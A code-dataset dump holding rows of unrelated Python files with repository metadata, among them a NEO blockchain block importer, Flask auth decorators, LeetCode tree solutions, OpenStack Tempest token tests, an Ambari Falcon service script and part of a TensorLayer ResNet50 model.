hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
21f23ffc26125396585aedb10c499a2d3a11d50b
| 3,871
|
py
|
Python
|
neo/bin/import_blocks.py
|
nunojusto/neo-python
|
1f54bca9d14fa547290f278f0539a4d4b0c13195
|
[
"MIT"
] | null | null | null |
neo/bin/import_blocks.py
|
nunojusto/neo-python
|
1f54bca9d14fa547290f278f0539a4d4b0c13195
|
[
"MIT"
] | 1
|
2018-09-26T17:50:24.000Z
|
2018-09-26T18:38:42.000Z
|
neo/bin/import_blocks.py
|
nunojusto/neo-python
|
1f54bca9d14fa547290f278f0539a4d4b0c13195
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from neo.Core.Blockchain import Blockchain
from neo.Core.Block import Block
from neo.IO.MemoryStream import MemoryStream
from neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain
from neo.Settings import settings
from neocore.IO.BinaryReader import BinaryReader
import argparse
import os
import shutil
from tqdm import trange
from prompt_toolkit import prompt
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mainnet", action="store_true", default=False,
help="use MainNet instead of the default TestNet")
parser.add_argument("-c", "--config", action="store", help="Use a specific config file")
# Where to store stuff
parser.add_argument("--datadir", action="store",
help="Absolute path to use for database directories")
parser.add_argument("-i", "--input", help="Where the input file lives")
parser.add_argument("-t", "--totalblocks", help="Total blocks to import", type=int)
parser.add_argument("-l", "--logevents", help="Log Smart Contract Events", default=False, action="store_true")
args = parser.parse_args()
if args.mainnet and args.config:
print("Cannot use both --config and --mainnet parameters, please use only one.")
exit(1)
# Setting the datadir must come before setting the network, else the wrong path is checked at net setup.
if args.datadir:
settings.set_data_dir(args.datadir)
# Setup depending on command line arguments. By default, the testnet settings are already loaded.
if args.config:
settings.setup(args.config)
elif args.mainnet:
settings.setup_mainnet()
if args.logevents:
settings.log_smart_contract_events = True
if not args.input:
raise Exception("Please specify an input path")
file_path = args.input
with open(file_path, 'rb') as file_input:
total_blocks = int.from_bytes(file_input.read(4), 'little')
target_dir = os.path.join(settings.DATA_DIR_PATH, settings.LEVELDB_PATH)
notif_target_dir = os.path.join(settings.DATA_DIR_PATH, settings.NOTIFICATION_DB_PATH)
print("Will import %s blocks to %s" % (total_blocks, target_dir))
print("This will overwrite any data currently in %s and %s.\nType 'confirm' to continue" % (target_dir, notif_target_dir))
confirm = prompt("[confirm]> ", is_password=False)
if not confirm == 'confirm':
print("Cancelled operation")
return False
try:
if os.path.exists(target_dir):
shutil.rmtree(target_dir)
if os.path.exists(notif_target_dir):
shutil.rmtree(notif_target_dir)
except Exception as e:
print("Could not remove existing data %s " % e)
return False
# Instantiate the blockchain and subscribe to notifications
blockchain = LevelDBBlockchain(settings.chain_leveldb_path)
Blockchain.RegisterBlockchain(blockchain)
chain = Blockchain.Default()
stream = MemoryStream()
reader = BinaryReader(stream)
block = Block()
for index in trange(total_blocks, desc='Importing Blocks', unit=' Block'):
# set stream data
block_len = int.from_bytes(file_input.read(4), 'little')
reader.stream.write(file_input.read(block_len))
reader.stream.seek(0)
# get block
block.Deserialize(reader)
# add
if block.Index > 0:
chain.AddBlockDirectly(block)
# reset blockheader
block._header = None
# reset stream
reader.stream.Cleanup()
print("Imported %s blocks to %s " % (total_blocks, target_dir))
if __name__ == "__main__":
main()
| 34.256637
| 130
| 0.65642
|
96df0d61537f12300f6dc9f1b8d875bcc284c758
| 1,080
|
py
|
Python
|
auth/hooks.py
|
erwincoumans/LoginServer
|
dcd407615dbf8bac91f49b4d0c8950a9b39790b4
|
[
"MIT"
] | null | null | null |
auth/hooks.py
|
erwincoumans/LoginServer
|
dcd407615dbf8bac91f49b4d0c8950a9b39790b4
|
[
"MIT"
] | null | null | null |
auth/hooks.py
|
erwincoumans/LoginServer
|
dcd407615dbf8bac91f49b4d0c8950a9b39790b4
|
[
"MIT"
] | null | null | null |
from flask import url_for, g, session, redirect, request, abort
from auth import app
from auth.models import User
import functools
import urllib.parse as urlparse
def static(path):
root = app.config.get('STATIC_ROOT')
if root is None:
return url_for('static', filename=path)
else:
return urlparse.urljoin(root, path)
@app.context_processor
def context_processor():
return dict(static=static)
@app.before_request
def before_request():
try:
g.user = User.query.filter_by(username=session['username']).first()
except Exception:
g.user = None
def login_required(f):
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if g.user is None:
return redirect(url_for('index', next=request.url))
return f(*args, **kwargs)
return decorated_function
def admin_required(f):
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if g.user and g.user.admin:
return f(*args, **kwargs)
else:
abort(403)
return decorated_function
| 26.341463
| 75
| 0.664815
|
5352944e07f64608333d7cf9ffaada9b2294ff04
| 2,780
|
py
|
Python
|
Widen/LC958_Check_Completeness_of_a_Binary_Tree.py
|
crazywiden/Leetcode_daily_submit
|
15637e260ab547022ac0c828dd196337bd8d50a3
|
[
"MIT"
] | null | null | null |
Widen/LC958_Check_Completeness_of_a_Binary_Tree.py
|
crazywiden/Leetcode_daily_submit
|
15637e260ab547022ac0c828dd196337bd8d50a3
|
[
"MIT"
] | null | null | null |
Widen/LC958_Check_Completeness_of_a_Binary_Tree.py
|
crazywiden/Leetcode_daily_submit
|
15637e260ab547022ac0c828dd196337bd8d50a3
|
[
"MIT"
] | null | null | null |
"""
958. Check Completeness of a Binary Tree
Given a binary tree, determine if it is a complete binary tree.
Definition of a complete binary tree from Wikipedia:
In a complete binary tree every level, except possibly the last, is completely filled, and all nodes in the last level are as far left as possible. It can have between 1 and 2h nodes inclusive at the last level h.
Example 1:
Input: [1,2,3,4,5,6]
Output: true
Explanation: Every level before the last is full (ie. levels with node-values {1} and {2, 3}), and all nodes in the last level ({4, 5, 6}) are as far left as possible.
"""
# method1
# define a complete node as: has both left and right child
# for a complete binary tree, we can't have an incomplete node before a complete node
# Runtime: 24 ms, faster than 98.76% of Python3 online submissions for Check Completeness of a Binary Tree.
# Memory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Check Completeness of a Binary Tree.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isCompleteTree(self, root: TreeNode) -> bool:
if root == None:
return True
is_seen_incomplete = False
queue = [root]
while len(queue) > 0:
tmp = queue.pop(0)
if tmp.left != None:
if is_seen_incomplete:
return False
queue.append(tmp.left)
else:
is_seen_incomplete = True
if tmp.right != None:
if is_seen_incomplete:
return False
queue.append(tmp.right)
else:
is_seen_incomplete = True
return True
# method2
# for a complete binary tree, the number of node should be less than the index
# where the index of left child of each node should be 2*index + 1
# the index of right child of each node should be 2*index + 2
# Runtime: 36 ms, faster than 42.91% of Python3 online submissions for Check Completeness of a Binary Tree.
# Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Check Completeness of a Binary Tree.
class Solution:
def isCompleteTree(self, root: TreeNode) -> bool:
if root == None:
return True
index = 0
num_node = 0
queue = [(root, index)]
while queue:
tmp, index = queue.pop(0)
if tmp:
num_node += 1
if index >= num_node:
return False
queue.append((tmp.left, 2*index+1))
queue.append((tmp.right, 2*index+2))
return True
| 36.103896
| 213
| 0.611511
|
cbba66f6c2633a18f31f29e4866576f2b41fcb70
| 1,438
|
py
|
Python
|
setup.py
|
Mohammed-bjj/python-midi
|
45a44164b2e612e0733326a0fb64ef632b4295de
|
[
"MIT"
] | null | null | null |
setup.py
|
Mohammed-bjj/python-midi
|
45a44164b2e612e0733326a0fb64ef632b4295de
|
[
"MIT"
] | null | null | null |
setup.py
|
Mohammed-bjj/python-midi
|
45a44164b2e612e0733326a0fb64ef632b4295de
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from distutils.core import setup, Extension
__base__ = {
'name': 'midi',
'version': 'v0.2.3',
'description': 'Python MIDI API',
'author': 'giles hall',
'author_email': 'ghall@csh.rit.edu',
'package_dir': {'midi':'src'},
'py_modules': ['midi.containers', 'midi.__init__', 'midi.events', 'midi.util', 'midi.fileio', 'midi.constants'],
'ext_modules': [],
'ext_package': '',
'scripts': ['scripts/mididump.py', 'scripts/mididumphw.py', 'scripts/midiplay.py'],
}
def setup_alsa(ns):
srclist = ["src/sequencer_alsa/sequencer_alsa.i"]
extns = {
'libraries': ['asound'],
#'extra_compile_args':['-DSWIGRUNTIME_DEBUG']
}
ext = Extension('_sequencer_alsa', srclist, **extns)
ns['ext_modules'].append(ext)
ns['package_dir']['midi.sequencer'] = 'src/sequencer_alsa'
ns['py_modules'].append('midi.sequencer.__init__')
ns['py_modules'].append('midi.sequencer.sequencer')
ns['py_modules'].append('midi.sequencer.sequencer_alsa')
ns['ext_package'] = 'midi.sequencer'
def configure_platform():
from sys import platform
ns = __base__.copy()
# currently, only the ALSA sequencer is supported
if platform.startswith('linux'):
setup_alsa(ns)
pass
else:
print("No sequencer available for '%s' platform." % platform)
return ns
if __name__ == "__main__":
setup(**configure_platform())
| 29.958333
| 116
| 0.639777
|
7c58f6463e24ec2ecf548a9e3a2723f59c3c8df9
| 1,318
|
py
|
Python
|
ExeSysMain/ExeSysFunctionalModules/ExeSysFunc/exe_sys_web_admin_func.py
|
alessandror/ExeSys-Python
|
a6c60577ff0024f90646ab37e2601288950fe734
|
[
"MIT"
] | null | null | null |
ExeSysMain/ExeSysFunctionalModules/ExeSysFunc/exe_sys_web_admin_func.py
|
alessandror/ExeSys-Python
|
a6c60577ff0024f90646ab37e2601288950fe734
|
[
"MIT"
] | null | null | null |
ExeSysMain/ExeSysFunctionalModules/ExeSysFunc/exe_sys_web_admin_func.py
|
alessandror/ExeSys-Python
|
a6c60577ff0024f90646ab37e2601288950fe734
|
[
"MIT"
] | null | null | null |
"""
Copyright 2018 Alex Redaelli <a.redaelli at gmail dot com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy,
modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
#-*- coding: utf-8 -*-
import redis
def test_web_cmd(data_to_process):
resp = {}
#print "test function with data %s" % data_to_process
resp['EOJ'] = data_to_process
resp['type'] = 'redis'
return resp
| 48.814815
| 126
| 0.769347
|
8915e2ec57c3403bef585dd5e9dd2d18fee3421d
| 2,798
|
py
|
Python
|
code/submission.py
|
enricogherardi/U-Net-with-Dice-Loss-for-Multiclass-Instance-Segmentation
|
b7f14d947764c92f6d5f5a37ea6fa1d626279121
|
[
"MIT"
] | null | null | null |
code/submission.py
|
enricogherardi/U-Net-with-Dice-Loss-for-Multiclass-Instance-Segmentation
|
b7f14d947764c92f6d5f5a37ea6fa1d626279121
|
[
"MIT"
] | null | null | null |
code/submission.py
|
enricogherardi/U-Net-with-Dice-Loss-for-Multiclass-Instance-Segmentation
|
b7f14d947764c92f6d5f5a37ea6fa1d626279121
|
[
"MIT"
] | null | null | null |
import os
import tensorflow as tf
import numpy as np
from PIL import Image
import json
# Set the seed to replicate the experiments
SEED = 1234
tf.random.set_seed(SEED)
print("Start Submitting...\n\n\n")
# Setting up all the previews variables
img_h = 1536
img_w = img_h
def meanIoU(y_true, y_pred):
# get predicted class from softmax
y_pred = tf.expand_dims(tf.argmax(y_pred, -1), -1)
per_class_iou = []
for i in range(1,3): # exclude the background class 0
# Get prediction and target related to only a single class (i)
class_pred = tf.cast(tf.where(y_pred == i, 1, 0), tf.float32)
class_true = tf.cast(tf.where(y_true == i, 1, 0), tf.float32)
intersection = tf.reduce_sum(class_true * class_pred)
union = tf.reduce_sum(class_true) + tf.reduce_sum(class_pred) - intersection
iou = (intersection + 1e-7) / (union + 1e-7)
per_class_iou.append(iou)
return tf.reduce_mean(per_class_iou)
from keras import backend as K
def dice_coef_multi(y_true, y_pred, smooth=1e-7):
y_true_f = K.flatten(K.one_hot(K.cast(y_true, 'int32'), num_classes=3)[...,1:])
y_pred_f = K.flatten(y_pred[...,1:])
intersect = K.sum(y_true_f * y_pred_f, axis=-1)
denom = K.sum(y_true_f + y_pred_f, axis=-1)
return K.mean((2. * intersect / (denom + smooth)))
def dice_coef_loss_multi(y_true, y_pred):
return 1 - dice_coef_multi(y_true, y_pred)
def rle_encode(img):
'''
img: numpy array, 1 - foreground, 0 - background
Returns run length as string formatted
'''
pixels = img.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return ' '.join(str(x) for x in runs)
def create_json(img, img_name, team, crop, file_path):
# Creating the dict
submission_dict = {}
submission_dict[img_name] = {}
submission_dict[img_name]['shape'] = img.shape
submission_dict[img_name]['team'] = team
submission_dict[img_name]['crop'] = crop
submission_dict[img_name]['segmentation'] = {}
#RLE encoding
# crop
rle_encoded_crop = rle_encode(mask_arr == 1)
# weed
rle_encoded_weed = rle_encode(mask_arr == 2)
submission_dict[img_name]['segmentation']['crop'] = rle_encoded_crop
submission_dict[img_name]['segmentation']['weed'] = rle_encoded_weed
# Please notice that in this example we have a single prediction.
# For the competition you have to provide segmentation for each of
# the test images.
# Finally, save the results into the submission.json file
with open(file_path, 'a') as f:
json.dump(submission_dict, f)
# Load the model
model = tf.keras.models.load_model("/content/drive/MyDrive/cp_24.ckpt", custom_objects={'meanIoU':meanIoU})#, 'dice_coef_loss_multi': dice_coef_loss_multi})
| 34.121951
| 156
| 0.688706
|
6b34288364291b9136f748b670813d67205bf33e
| 903
|
py
|
Python
|
mysite/my_calendar/models.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
mysite/my_calendar/models.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
mysite/my_calendar/models.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
class Entry(models.Model):
title = models.CharField(max_length=40)
snippet = models.CharField(max_length=150, blank=True)
body = models.TextField(max_length=10000, blank=True)
created = models.DateTimeField(auto_now_add=True)
date = models.DateField(blank=True)
creator = models.ForeignKey(User, blank=True, null=True)
remind = models.BooleanField(default=False)
def __unicode__(self):
if self.title:
return unicode(self.creator) + u" - " + self.title
else:
return unicode(self.creator) + u" - " + self.snippet[:40]
def short(self):
if self.snippet:
return "<i>%s</i> - %s" % (self.title, self.snippet)
else:
return self.title
short.allow_tags = True
class Meta:
verbose_name_plural = "entries"
| 33.444444
| 69
| 0.646733
|
7fec28d6002e5dcfe869d14f32c79e83574487da
| 5,037
|
py
|
Python
|
tempest/api/identity/admin/test_tokens.py
|
NetApp/tempest
|
dd86b1517ec5ac16c26975ed0ce0d8b7ddcac6cc
|
[
"Apache-2.0"
] | null | null | null |
tempest/api/identity/admin/test_tokens.py
|
NetApp/tempest
|
dd86b1517ec5ac16c26975ed0ce0d8b7ddcac6cc
|
[
"Apache-2.0"
] | null | null | null |
tempest/api/identity/admin/test_tokens.py
|
NetApp/tempest
|
dd86b1517ec5ac16c26975ed0ce0d8b7ddcac6cc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2013 Huawei Technologies Co.,LTD.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.identity import base
from tempest.common.utils import data_utils
from tempest.test import attr
class TokensTestJSON(base.BaseIdentityV2AdminTest):
_interface = 'json'
@attr(type='gate')
def test_create_get_delete_token(self):
# get a token by username and password
user_name = data_utils.rand_name(name='user-')
user_password = data_utils.rand_name(name='pass-')
# first:create a tenant
tenant_name = data_utils.rand_name(name='tenant-')
resp, tenant = self.client.create_tenant(tenant_name)
self.assertEqual(200, resp.status)
self.data.tenants.append(tenant)
# second:create a user
resp, user = self.client.create_user(user_name, user_password,
tenant['id'], '')
self.assertEqual(200, resp.status)
self.data.users.append(user)
# then get a token for the user
rsp, body = self.token_client.auth(user_name,
user_password,
tenant['name'])
self.assertEqual(rsp['status'], '200')
self.assertEqual(body['token']['tenant']['name'],
tenant['name'])
# Perform GET Token
token_id = body['token']['id']
resp, token_details = self.client.get_token(token_id)
self.assertEqual(resp['status'], '200')
self.assertEqual(token_id, token_details['token']['id'])
self.assertEqual(user['id'], token_details['user']['id'])
self.assertEqual(user_name, token_details['user']['name'])
self.assertEqual(tenant['name'],
token_details['token']['tenant']['name'])
# then delete the token
resp, body = self.client.delete_token(token_id)
self.assertEqual(resp['status'], '204')
@attr(type='gate')
def test_rescope_token(self):
"""An unscoped token can be requested, that token can be used to
request a scoped token.
"""
# Create a user.
user_name = data_utils.rand_name(name='user-')
user_password = data_utils.rand_name(name='pass-')
tenant_id = None # No default tenant so will get unscoped token.
email = ''
resp, user = self.client.create_user(user_name, user_password,
tenant_id, email)
self.assertEqual(200, resp.status)
self.data.users.append(user)
# Create a couple tenants.
tenant1_name = data_utils.rand_name(name='tenant-')
resp, tenant1 = self.client.create_tenant(tenant1_name)
self.assertEqual(200, resp.status)
self.data.tenants.append(tenant1)
tenant2_name = data_utils.rand_name(name='tenant-')
resp, tenant2 = self.client.create_tenant(tenant2_name)
self.assertEqual(200, resp.status)
self.data.tenants.append(tenant2)
# Create a role
role_name = data_utils.rand_name(name='role-')
resp, role = self.client.create_role(role_name)
self.assertEqual(200, resp.status)
self.data.roles.append(role)
# Grant the user the role on the tenants.
resp, _ = self.client.assign_user_role(tenant1['id'], user['id'],
role['id'])
self.assertEqual(200, resp.status)
resp, _ = self.client.assign_user_role(tenant2['id'], user['id'],
role['id'])
self.assertEqual(200, resp.status)
# Get an unscoped token.
rsp, body = self.token_client.auth(user_name, user_password)
self.assertEqual(200, resp.status)
token_id = body['token']['id']
# Use the unscoped token to get a token scoped to tenant1
rsp, body = self.token_client.auth_token(token_id, tenant=tenant1_name)
self.assertEqual(200, resp.status)
scoped_token_id = body['token']['id']
# Revoke the scoped token
resp, body = self.client.delete_token(scoped_token_id)
self.assertEqual(204, resp.status)
# Use the unscoped token to get a token scoped to tenant2
rsp, body = self.token_client.auth_token(token_id, tenant=tenant2_name)
self.assertEqual(204, resp.status)
class TokensTestXML(TokensTestJSON):
_interface = 'xml'
| 40.620968
| 79
| 0.620012
|
9a72af1b0e58c4570f089df771d034d5d3303336
| 3,014
|
py
|
Python
|
ambari-server/src/main/resources/stacks/HDP/2.1.GlusterFS/services/FALCON/package/scripts/falcon.py
|
fangxingli/mambari
|
6da9f6090d4d42623529b73413c8feb8b7f6fe45
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-05-06T06:24:04.000Z
|
2021-05-06T06:24:04.000Z
|
ambari-server/src/main/resources/stacks/HDP/2.1.GlusterFS/services/FALCON/package/scripts/falcon.py
|
fangxingli/mambari
|
6da9f6090d4d42623529b73413c8feb8b7f6fe45
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
ambari-server/src/main/resources/stacks/HDP/2.1.GlusterFS/services/FALCON/package/scripts/falcon.py
|
fangxingli/mambari
|
6da9f6090d4d42623529b73413c8feb8b7f6fe45
|
[
"Apache-2.0",
"MIT"
] | 3
|
2017-10-31T11:42:31.000Z
|
2021-04-26T07:17:53.000Z
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management import *
def falcon(type, action = None):
import params
if action == 'config':
Directory(params.falcon_pid_dir,
owner=params.falcon_user
)
Directory(params.falcon_log_dir,
owner=params.falcon_user
)
Directory(params.falcon_webapp_dir,
owner=params.falcon_user
)
Directory(params.falcon_home,
owner=params.falcon_user
)
File(params.falcon_conf_dir + '/falcon-env.sh',
content=Template('falcon-env.sh.j2')
)
File(params.falcon_conf_dir + '/client.properties',
content=Template('client.properties.j2'),
mode=0644
)
PropertiesFile(params.falcon_conf_dir + '/runtime.properties',
properties=params.falcon_runtime_properties,
mode=0644
)
PropertiesFile(params.falcon_conf_dir + '/startup.properties',
properties=params.falcon_startup_properties,
mode=0644
)
if type == 'server':
if action == 'config':
if params.store_uri[0:4] == "hdfs":
params.HdfsDirectory(params.store_uri,
action="create_delayed",
owner=params.falcon_user,
mode=0755
)
params.HdfsDirectory(params.flacon_apps_dir,
action="create_delayed",
owner=params.falcon_user,
mode=0777#TODO change to proper mode
)
params.HdfsDirectory(None, action="create")
Directory(params.falcon_local_dir,
owner=params.falcon_user,
create_parents = True
)
if params.falcon_embeddedmq_enabled == True:
Directory(params.falcon_embeddedmq_data,
owner=params.falcon_user,
create_parents = True
)
if action == 'start':
Execute(format('{falcon_home}/bin/falcon-start -port {falcon_port}'),
user=params.falcon_user
)
if action == 'stop':
Execute(format('{falcon_home}/bin/falcon-stop'),
user=params.falcon_user
)
File(params.server_pid_file,
action='delete'
)
| 34.643678
| 75
| 0.629064
|
9b50eaa4a46724ff66fe75bcc58b1d0b6773969e
| 782
|
py
|
Python
|
scripts/json_parser/category-pic-gen.py
|
Rinsightproject/RINSIGHT
|
db4ce2635998e71dcef84d182c9b31375b8d31b9
|
[
"Apache-2.0"
] | null | null | null |
scripts/json_parser/category-pic-gen.py
|
Rinsightproject/RINSIGHT
|
db4ce2635998e71dcef84d182c9b31375b8d31b9
|
[
"Apache-2.0"
] | null | null | null |
scripts/json_parser/category-pic-gen.py
|
Rinsightproject/RINSIGHT
|
db4ce2635998e71dcef84d182c9b31375b8d31b9
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
def get_project_root():
cwd_list = os.getcwd().split('/')
need_path_list = []
for item in cwd_list:
need_path_list.append(item)
if item == 'rust-up-to-you':
break
return '/'.join(need_path_list)
if __name__ == '__main__':
project_root = get_project_root()
json_output_path = project_root + '/data/json/category.json'
pic_output_path = project_root + '/data/pic/category.jpg'
top_n = 15
if len(sys.argv) > 1:
top_n = sys.argv[1]
os.system("python3 "+project_root+"/scripts/json_parser/category.py "+str(top_n) \
+" > "+json_output_path)
os.system("python3 "+project_root+"/scripts/draw_bar/draw_category_bar.py "+\
json_output_path+" "+pic_output_path)
| 26.066667
| 86
| 0.640665
|
458f2591240a00da81dc5b16f23777a17cfc5696
| 6,871
|
py
|
Python
|
tensorlayer/models/resnet.py
|
Howdy-Personally/tensorlayer-master
|
bb92e4e187419d5e7ded8331d5c7cbf5615ee744
|
[
"Apache-2.0"
] | 4,484
|
2017-12-27T03:28:35.000Z
|
2021-12-02T14:42:58.000Z
|
tensorlayer/models/resnet.py
|
Howdy-Personally/tensorlayer-master
|
bb92e4e187419d5e7ded8331d5c7cbf5615ee744
|
[
"Apache-2.0"
] | 549
|
2017-12-28T07:19:52.000Z
|
2021-11-05T02:34:20.000Z
|
tensorlayer/models/resnet.py
|
Howdy-Personally/tensorlayer-master
|
bb92e4e187419d5e7ded8331d5c7cbf5615ee744
|
[
"Apache-2.0"
] | 1,076
|
2017-12-27T12:25:46.000Z
|
2021-11-24T09:12:36.000Z
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""ResNet for ImageNet.
# Reference:
- [Deep Residual Learning for Image Recognition](
https://arxiv.org/abs/1512.03385) (CVPR 2016 Best Paper Award)
"""
import os
import tensorflow as tf
from tensorlayer import logging
from tensorlayer.files import (assign_weights, load_npz, maybe_download_and_extract)
from tensorlayer.layers import (BatchNorm, Conv2d, Dense, Elementwise, GlobalMeanPool2d, Input, MaxPool2d)
from tensorlayer.models import Model
__all__ = [
'ResNet50',
]
def identity_block(input, kernel_size, n_filters, stage, block):
"""The identity block where there is no conv layer at shortcut.
Parameters
----------
input : tf tensor
Input tensor from above layer.
kernel_size : int
The kernel size of middle conv layer at main path.
n_filters : list of integers
The numbers of filters for 3 conv layer at main path.
stage : int
Current stage label.
block : str
Current block label.
Returns
-------
Output tensor of this block.
"""
filters1, filters2, filters3 = n_filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2d(filters1, (1, 1), W_init=tf.initializers.he_normal(), name=conv_name_base + '2a')(input)
x = BatchNorm(name=bn_name_base + '2a', act='relu')(x)
ks = (kernel_size, kernel_size)
x = Conv2d(filters2, ks, padding='SAME', W_init=tf.initializers.he_normal(), name=conv_name_base + '2b')(x)
x = BatchNorm(name=bn_name_base + '2b', act='relu')(x)
x = Conv2d(filters3, (1, 1), W_init=tf.initializers.he_normal(), name=conv_name_base + '2c')(x)
x = BatchNorm(name=bn_name_base + '2c')(x)
x = Elementwise(tf.add, act='relu')([x, input])
return x
def conv_block(input, kernel_size, n_filters, stage, block, strides=(2, 2)):
"""The conv block where there is a conv layer at shortcut.
Parameters
----------
input : tf tensor
Input tensor from above layer.
kernel_size : int
The kernel size of middle conv layer at main path.
n_filters : list of integers
The numbers of filters for 3 conv layer at main path.
stage : int
Current stage label.
block : str
Current block label.
strides : tuple
Strides for the first conv layer in the block.
Returns
-------
Output tensor of this block.
"""
filters1, filters2, filters3 = n_filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2d(filters1, (1, 1), strides=strides, W_init=tf.initializers.he_normal(), name=conv_name_base + '2a')(input)
x = BatchNorm(name=bn_name_base + '2a', act='relu')(x)
ks = (kernel_size, kernel_size)
x = Conv2d(filters2, ks, padding='SAME', W_init=tf.initializers.he_normal(), name=conv_name_base + '2b')(x)
x = BatchNorm(name=bn_name_base + '2b', act='relu')(x)
x = Conv2d(filters3, (1, 1), W_init=tf.initializers.he_normal(), name=conv_name_base + '2c')(x)
x = BatchNorm(name=bn_name_base + '2c')(x)
shortcut = Conv2d(filters3, (1, 1), strides=strides, W_init=tf.initializers.he_normal(),
name=conv_name_base + '1')(input)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut)
x = Elementwise(tf.add, act='relu')([x, shortcut])
return x
block_names = ['2a', '2b', '2c', '3a', '3b', '3c', '3d', '4a', '4b', '4c', '4d', '4e', '4f', '5a', '5b', '5c'
] + ['avg_pool', 'fc1000']
block_filters = [[64, 64, 256], [128, 128, 512], [256, 256, 1024], [512, 512, 2048]]
def ResNet50(pretrained=False, end_with='fc1000', n_classes=1000, name=None):
"""Pre-trained MobileNetV1 model (static mode). Input shape [?, 224, 224, 3].
To use pretrained model, input should be in BGR format and subtracted from ImageNet mean [103.939, 116.779, 123.68].
Parameters
----------
pretrained : boolean
Whether to load pretrained weights. Default False.
end_with : str
The end point of the model [conv, depth1, depth2 ... depth13, globalmeanpool, out].
Default ``out`` i.e. the whole model.
n_classes : int
Number of classes in final prediction.
name : None or str
Name for this model.
Examples
---------
Classify ImageNet classes, see `tutorial_models_resnet50.py`
>>> # get the whole model with pretrained weights
>>> resnet = tl.models.ResNet50(pretrained=True)
>>> # use for inferencing
>>> output = resnet(img1, is_train=False)
>>> prob = tf.nn.softmax(output)[0].numpy()
Extract the features before fc layer
>>> resnet = tl.models.ResNet50(pretrained=True, end_with='5c')
>>> output = resnet(img1, is_train=False)
Returns
-------
ResNet50 model.
"""
